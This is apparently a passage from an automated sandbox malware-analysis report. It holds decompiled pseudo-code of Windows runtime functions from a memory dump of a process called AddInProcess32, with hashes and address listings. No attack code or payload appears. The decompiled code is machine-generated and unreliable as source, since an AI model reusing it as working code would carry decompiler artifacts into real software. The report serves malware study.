0x01880032
0x01880037
0x01880043
0x018c4b3a
0x01880049
0x01880049
0x01880049
0x0188004e
0x01880053
0x018c4b48
0x018c4b5a
0x018c4b4a
0x018c4b53
0x018c4b53
0x018c4b5f
0x00000000
0x018c4b61
0x00000000
0x018c4b61
0x01880059
0x01880059
0x01880060
0x018c4b6f
0x018c4b6f
0x01880069
0x018c4b83
0x00000000
0x00000000
0x018c4b90
0x018c4b9b
0x018c4b9b
0x018c4ba4
0x00000000
0x00000000
0x018c4baa
0x00000000
0x0188006f
0x0188006f
0x00000000
0x0188006f
0x01880069

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 7850df7d0ebdbdbc9c0249d426c7712397fdbe8db652e4afa7c97acdaf27af4b
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: B511C8326066C18FE723D7ACC568B357BD4AF41B58F0900A4ED14C7693E739DB82C261

Uniqueness

Uniqueness Score: -1.00%

Function 0186766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0186766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0188F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0188F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01874620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x01867672
0x0186767f
0x01867689
0x018676de
0x018676de
0x0186768b
0x01867691
0x01867693
0x01867697
0x00000000
0x01867699
0x018676a8
0x00000000
0x018676aa
0x018676ad
0x018676b1
0x00000000
0x018676b3
0x018676b3
0x018676b5
0x018676ba
0x018676bc
0x018676bc
0x018676c0
0x00000000
0x018676c2
0x018676ce
0x018676ce
0x018676c0
0x018676b1
0x018676a8
0x01867697
0x018676d9

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: c13a0702e694a779a13952ad9991e85647d0faa6e8162b2f9f8a92f7f1ee06b9
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 3301A232701119ABD720EE6ECC41E5BBBADEB84B64F280534BA09CB250DE30DE01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01859080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01859080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x19485ec;
				E01872280(_t48, 0x19485ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0186FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x194538c; // 0x77996828
					if( *_t84 != 0x1945388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x192f6e8);
						E018AD0E8(0x19485ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E019288F5(_t80, _t85, 0x1945388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x19486c0; // 0x12e07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x19486b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01872280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E019288F5(0x19485ec, _t85, 0x1945388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0189AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x194b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x19484c0;
																			if(_t82 >=  *0x19484c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01929063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0185922A(_t99);
										_t64 = E01877D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01928B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x19486c0; // 0x12e07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x19486b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x19486bc;
													_t87 = 0x19486b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01859240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x19486c4;
												_t87 = 0x19486c0;
												L27:
												E01889B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E018AD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1945388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x194538c = _t51;
						goto L6;
					}
				}
			}

0x01859082
0x01859083
0x01859084
0x01859085
0x01859087
0x01859096
0x01859098
0x01859098
0x0185909e
0x018590a8
0x018590e7
0x018590e7
0x018590aa
0x018590b0
0x018590b7
0x018590bd
0x018590dd
0x018590e6
0x018590bf
0x018590bf
0x018590c7
0x018590cf
0x018590f1
0x018590f2
0x018590f4
0x018590f5
0x018590f6
0x018590f7
0x018590f8
0x018590f9
0x018590fa
0x018590fb
0x018590fc
0x018590fd
0x018590fe
0x018590ff
0x01859100
0x01859102
0x01859107
0x0185910c
0x01859110
0x01859113
0x01859115
0x01859136
0x0185913f
0x01859143
0x018b37e4
0x018b37e4
0x01859117
0x01859117
0x0185911d
0x00000000
0x0185911f
0x0185911f
0x01859125
0x00000000
0x01859127
0x0185912d
0x01859130
0x01859134
0x01859158
0x0185915d
0x01859161
0x01859168
0x018b3715
0x0185916e
0x0185916e
0x01859175
0x01859177
0x0185917e
0x0185917f
0x01859182
0x01859182
0x01859187
0x01859187
0x0185918a
0x0185918d
0x0185918f
0x01859192
0x01859195
0x01859198
0x01859198
0x01859198
0x0185919a
0x00000000
0x00000000
0x018b371f
0x018b3721
0x018b3727
0x018b372f
0x018b3733
0x018b3735
0x018b3738
0x018b373b
0x018b373d
0x018b3740
0x00000000
0x018b3746
0x018b3746
0x018b3749
0x00000000
0x018b374f
0x018b374f
0x018b3751
0x018b3757
0x018b3759
0x018b375c
0x018b375c
0x018b375e
0x018b375e
0x018b3761
0x018b3764
0x00000000
0x00000000
0x018b3766
0x018b3768
0x018b37a3
0x018b37a3
0x018b37a5
0x018b37a7
0x018b37ad
0x018b37b0
0x018b37b2
0x018b37bc
0x018b37c2
0x018b37c2
0x018b37b2
0x01859187
0x01859187
0x0185918a
0x0185918d
0x0185918f
0x01859192
0x01859195
0x00000000
0x01859195
0x00000000
0x018b376a
0x018b376a
0x018b376a
0x018b376c
0x018b376c
0x018b376f
0x018b3775
0x00000000
0x00000000
0x018b3777
0x018b3779
0x018b3782
0x018b3787
0x018b3789
0x018b3790
0x018b3790
0x018b378b
0x018b378b
0x018b378b
0x018b3792
0x018b3795
0x00000000
0x018b3795
0x00000000
0x018b3779
0x018b3798
0x00000000
0x018b3798
0x00000000
0x018b3768
0x018b379b
0x018b379b
0x018b3751
0x018b3749
0x00000000
0x018b3740
0x018591a0
0x018591a3
0x018591a9
0x018591b0
0x00000000
0x018591b0
0x01859187
0x018591b4
0x018591b4
0x018591bb
0x018591c0
0x018591c5
0x018591c7
0x018b37da
0x018591cd
0x018591cd
0x018591cd
0x018591d2
0x018591d5
0x01859239
0x01859239
0x018591d7
0x018591db
0x018591e1
0x018591e7
0x018591fd
0x01859203
0x0185921e
0x01859223
0x00000000
0x01859205
0x01859205
0x01859208
0x0185920c
0x01859214
0x01859214
0x0185920c
0x018591e9
0x018591e9
0x018591ee
0x018591f3
0x018591f3
0x018591f3
0x018591e7
0x00000000
0x00000000
0x00000000
0x01859134
0x01859125
0x0185911d
0x0185914e
0x018590d1
0x018590d1
0x018590d3
0x018590d6
0x018590d8
0x00000000
0x018590d8
0x018590cf

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf50d86fad0d708723b2f7636ca5ca874faedbbe895bf722c301d56a4ad0e1b
Instruction ID: 77b16df5bb9ea849e851c72cf22b6855c9b83ac81e32a23a1a952d1c8f0e099a
Opcode Fuzzy Hash: faf50d86fad0d708723b2f7636ca5ca874faedbbe895bf722c301d56a4ad0e1b
Instruction Fuzzy Hash: 8301AFB2A05604CFD3259F1CD840B22BBFAEB85729F264466EA05CB692C774DE41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 018EC450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E018EC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01899910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E018995B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E018995D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E018995D0();
				return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x018ec458
0x018ec45d
0x018ec466
0x018ec468
0x018ec469
0x018ec46a
0x018ec46b
0x018ec46e
0x018ec46f
0x018ec471
0x018ec476
0x018ec476
0x018ec47c
0x018ec47e
0x018ec480
0x018ec480
0x018ec483
0x018ec484
0x018ec486
0x018ec488
0x018ec48f
0x018ec491
0x018ec493
0x018ec493
0x018ec48f
0x018ec498
0x018ec49e
0x018ec4ad
0x018ec4ad
0x018ec4b2
0x018ec4b4
0x018ec4cd

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 923b7095daf24341ed4aa1c1cee8267dc487003eab192a1bda987a4d39ade157
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: CC019671140506BFEB21AF6DCC84E63FB7DFF55395F044529F21492560C721EDA1C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01924015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01924015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01872280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01872280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x19486ac);
					E0185F900(0x19486d4, _t28);
					E0186FFB0(0x19486ac, _t28, 0x19486ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0186FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0192401a
0x0192401e
0x01924023
0x01924028
0x01924029
0x0192402b
0x0192402f
0x01924043
0x01924046
0x01924051
0x01924057
0x0192405f
0x01924062
0x01924067
0x0192406f
0x0192407c
0x0192407c
0x0192408c
0x0192408c
0x01924097

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b4fb5285e94ee2a8248beac308b5a2fe763d69fe8d2174571a0c014d448d09
Instruction ID: 6f02921d2d2a9362b85df4f48d8b95f81ce2579a508eaa25b65cc887664a077b
Opcode Fuzzy Hash: 25b4fb5285e94ee2a8248beac308b5a2fe763d69fe8d2174571a0c014d448d09
Instruction Fuzzy Hash: 1E018F72241A467FD751AB6DCE84E13F7ACFF95760B000229F608C3A11DB24ED51C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 0191138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0191138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x194d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0189FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01877D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0189B640(E01899AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0191138a
0x0191138a
0x01911399
0x019113a3
0x019113a8
0x019113aa
0x019113b5
0x019113bb
0x019113c3
0x019113c6
0x019113c9
0x019113d4
0x019113e6
0x019113d6
0x019113df
0x019113df
0x019113f1
0x019113f2
0x019113f4
0x019113f9
0x0191140e

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a57ad33b494e4854b868e734f9abb4a26208709db45db83d972df6d85280a2
Instruction ID: 746d45c5a574761fbfd50b0d29045112f8527f68e52ee27e6821da0d4f2fc2ee
Opcode Fuzzy Hash: 91a57ad33b494e4854b868e734f9abb4a26208709db45db83d972df6d85280a2
Instruction Fuzzy Hash: 4F019E71A0120CAFCB14DFACD841EAEBBB8EF44710F04406AF904EB280EA74DA41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 019114FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E019114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x194d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0189FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01877D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0189B640(E01899AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x019114fb
0x019114fb
0x0191150a
0x01911514
0x01911519
0x0191151b
0x01911526
0x0191152c
0x01911534
0x01911537
0x0191153a
0x01911545
0x01911557
0x01911547
0x01911550
0x01911550
0x01911562
0x01911563
0x01911565
0x0191156a
0x0191157f

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7364fc42ca72c21a7710eecae6e28755b03b2d8e41d837bd9a37f1e3593070cb
Instruction ID: 8ca86ae5530437835ffe24e2bef5f479bcbec5d6bd4cca6c8d812f2ceb277e8e
Opcode Fuzzy Hash: 7364fc42ca72c21a7710eecae6e28755b03b2d8e41d837bd9a37f1e3593070cb
Instruction Fuzzy Hash: 50019E71A0124CAFCB14DFACD845EAEBBB8EF44710F04406AFA04EB280DA74DA40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 018558EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E018558EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x194d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1835c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01855943() != 0 &&  *0x1945320 > 5) {
					E018D7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E018D7B5E( &_v28, _t28);
					_t11 = E018D7B9C(0x1945320, 0x183bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0189B640(_t11, _t17, _v8 ^ _t29, 0x183bf15, _t27, _t28);
			}

0x018558fb
0x018558fe
0x01855906
0x0185590a
0x0185593c
0x0185593c
0x0185590c
0x0185590c
0x01855911
0x00000000
0x01855913
0x01855913
0x01855913
0x01855911
0x0185591d
0x018b1035
0x018b103c
0x018b103f
0x018b1056
0x018b1056
0x0185593b

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdc581d83c044b9daca3b9632bd06c438381026fc5d651556c7f9b942c430dc
Instruction ID: b81e22ceb9ef4ade1684e51f46f9434bdcc8add327c327ead129c790fba8d71b
Opcode Fuzzy Hash: 6cdc581d83c044b9daca3b9632bd06c438381026fc5d651556c7f9b942c430dc
Instruction Fuzzy Hash: 66018F31A00209DBDB14EB6DE8009BEB7B8EB85374F590069AE05DB244DE24DF06C791

Uniqueness

Uniqueness Score: -1.00%

Function 0186B02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0186B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01877D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E018D7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0186b037
0x0186b039
0x0186b03b
0x0186b040
0x018ba60e
0x00000000
0x00000000
0x018ba61d
0x0186b04b
0x0186b04e
0x018ba627
0x018ba634
0x00000000
0x00000000
0x018ba641
0x018ba653
0x018ba643
0x018ba64c
0x018ba64c
0x018ba65b
0x00000000
0x00000000
0x00000000
0x018ba66c
0x0186b057
0x0186b057
0x0186b057
0x0186b046
0x0186b046
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 2613b85628caad3085a6cf6e6c15386d8b6dabfa4fe1c21319141c8cb9168908
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 08018472301684DFE327C71CC988F667FDCEB85758F0900A1FA15CB651D629DE40C622

Uniqueness

Uniqueness Score: -1.00%

Function 01921074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01921074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
